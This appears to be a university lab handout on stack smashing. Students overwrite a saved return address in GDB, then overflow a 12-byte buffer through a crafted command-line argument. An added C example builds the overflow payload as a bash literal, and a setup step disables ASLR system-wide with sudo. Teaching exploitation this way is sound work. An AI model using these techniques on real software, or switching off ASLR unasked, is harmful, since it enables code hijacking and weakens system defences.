Lab 4: Stack Smashing

In this lab, we will use what we have learned about the stack and procedure calls to make programs do things their authors never intended.

Before starting the lab, print out a copy of the Question Sheet. You need to answer questions on this sheet as you go through the lab!

Part 1: Hacking via Pointer

  1. Log in to your Linux machine and pull your Git repo. cd to the lab4 directory.
  2. Run the following command to turn off address-space layout randomization (ASLR), so that stack and code addresses stay the same from one run to the next: sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'. This setting does not survive a reboot, so repeat it if you come back to the lab later.
  3. Examine part1.c using vim.
  4. To compile and run the code, use: make run
  5. To compile the code and run it in GDB, use: make run-gdb

Invoke the surprise function without calling it

You may notice that the function surprise is never explicitly called in the program. Our goal in this part is to manipulate the stack space and make the program invoke the function without calling it.

How to do it?

In short, we overwrite the return address that add has saved on the stack with the address of the surprise function. When add finishes and executes its ret instruction, the CPU pops that word off the stack and jumps to it, expecting to land back in main; since the word now holds the address of surprise, execution continues in surprise instead.

We guide you through this implementation with the questions in Part 1 of the Question Sheet. First, run the code in GDB (make run-gdb) and set a series of breakpoints to observe the key pieces of information you will need: where on the stack add's return address lives, and what the address of surprise is.

Follow the questions/instructions in the Question Sheet to finish the rest of Part 1.

Part 2: Hacking via Buffer Overflow

Hacking by modifying the source code is not real hacking, but Part 1 of the lab showed you that overwriting a function's return address makes the program do unexpected things. In this part, we apply the same technique (stack smashing) in a more realistic way, i.e., without changing the source code.

First, go to your lab4 folder and open part2.c in vim or emacs. Try to understand what the code does, paying particular attention to the functions doIt and copyIntoBuffer.

Idea: We want to smash the stack frame of the doIt function by placing the address of holyGrail exactly where doIt's return address is stored. To do this, we overflow the array char buffer[12] by copying more data into it than it can hold. The data we supply consists of filler bytes followed by the address of holyGrail, with the filler sized so that the address lands precisely on the saved return address. When doIt finishes, instead of returning to the place it was called from, it jumps to holyGrail.

How: As you may have noticed, the source that copyIntoBuffer copies from is the command-line input, i.e., something we type in. So all we need to do is give it the "sneaky" command-line input.

In Part 2, to run the program, DON'T USE MAKE RUN. Instead, you will use a script we provide. To run the program with program input ABCD, you can type:

./run_part2.sh ABCD

To debug the part2 program with input ABCD and in GDB, you can type:

./run_part2.sh ABCD -g

In addition, in Part 2 we have to supply a function address as part of the input argument, which means typing raw bytes. To pass raw bytes in a command-line argument, we can do the following:

Assuming we want to give the four bytes 0x41 0x42 0x43 0x44 (the value 0x41424344 written byte by byte) as the input and also run the code in GDB, we can type:

./run_part2.sh $'\x41\x42\x43\x44' -g

Notice that the input must start with $ and be wrapped in single quotes (this is bash's ANSI-C quoting). Each byte is represented by \x followed by two hexadecimal digits. Two things to keep in mind when you put a real address in the input: on a little-endian machine such as x86, the least significant byte of the address is stored first, so an address 0x0804849b is typed as \x9b\x84\x04\x08; and a command-line argument cannot carry a 0x00 byte, because the string ends at the first NUL, so an address containing a zero byte cannot be passed this way. It is recommended to type this command into your terminal manually rather than copy it from the webpage, as the ' characters can be malformed when copying.

With the skills and knowledge from the previous part, you are ready to practice your hacking. We will give less hand-holding and leave more of the work to you.

To answer the Part 2 questions in the Question Sheet, you need to find the proper places to set breakpoints and figure out the answers from GDB.
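Once GDB has given you the two numbers that matter in Part 2, the distance from the start of buffer[] to doIt's saved return address and the address of holyGrail, the remaining work is to turn them into an argument you can type after ./run_part2.sh. The following is an added example, not part of the lab's part2.c: it builds the payload (filler bytes, then the address in little-endian order, as the lab's 4-byte \x41\x42\x43\x44 convention implies a 32-bit x86 target), refuses payloads that contain a 0x00 byte because such a byte cannot travel through argv, and renders the result as a bash $'...' literal. The offset 24 and the address 0x0804849b used in main are made-up placeholders, not the lab's real values; substitute what you read off in GDB.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the lab's part2.c: build the "sneaky" argv[1] for a
   stack smash like Part 2. Layout assumptions, both found with GDB in the
   lab: 'pad' bytes of filler from the start of buffer[] up to the saved
   return address, then the 4-byte address of holyGrail stored little-endian
   (x86). The offset and address used in main() are placeholders. */

enum { ADDR_LEN = 4 };   /* the lab passes 32-bit addresses, e.g. \x41\x42\x43\x44 */

/* Write 'pad' filler bytes followed by addr (least significant byte first)
   into out. Returns the payload length, or -1 if it does not fit or if any
   byte is 0x00: argv strings end at the first NUL, so the copy would stop short. */
int build_payload(unsigned char *out, size_t out_len, size_t pad, uint32_t addr)
{
    size_t total = pad + ADDR_LEN;
    if (total > out_len)
        return -1;
    memset(out, 'A', pad);                      /* filler up to the return-address slot */
    for (int i = 0; i < ADDR_LEN; i++)          /* little-endian: low byte first */
        out[pad + i] = (unsigned char)(addr >> (8 * i));
    for (size_t i = 0; i < total; i++)
        if (out[i] == 0)
            return -1;                          /* a NUL byte cannot pass through argv */
    return (int)total;
}

/* Render the payload as a bash ANSI-C quoted string ($'...') that can be
   typed after ./run_part2.sh. Printable bytes stay literal, everything else
   becomes \xHH. Returns the number of characters written, or -1 if out is too small. */
int to_bash_literal(const unsigned char *payload, size_t n, char *out, size_t out_len)
{
    size_t pos = 0;
    if (out_len < 3)
        return -1;
    out[pos++] = '$';
    out[pos++] = '\'';
    for (size_t i = 0; i < n; i++) {
        unsigned char c = payload[i];
        int printable = c >= 0x20 && c < 0x7f && c != '\'' && c != '\\';
        if (printable) {
            if (pos + 1 >= out_len)
                return -1;
            out[pos++] = (char)c;
        } else {
            if (pos + 4 >= out_len)
                return -1;
            pos += (size_t)snprintf(out + pos, out_len - pos, "\\x%02x", c);
        }
    }
    if (pos + 2 > out_len)
        return -1;
    out[pos++] = '\'';
    out[pos] = '\0';
    return (int)pos;
}

int main(void)
{
    unsigned char payload[64];
    char literal[256];
    /* 24 and 0x0804849b are placeholders; use the offset and address from GDB. */
    int n = build_payload(payload, sizeof payload, 24, 0x0804849bu);
    if (n < 0) {
        puts("payload would contain a NUL byte or is too long; pick another target");
        return 1;
    }
    to_bash_literal(payload, (size_t)n, literal, sizeof literal);
    printf("./run_part2.sh %s\n", literal);
    return 0;
}
```

The printed command is what you type (manually, per the note above about quotes); append -g to run it under GDB. If the address you found has a zero byte, build_payload says no rather than silently handing you a truncated argument, which is the usual reason a "correct" payload never reaches the return-address slot.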

Finishing the lab

  1. Scan and Upload the signed Question Sheet to GradeScope.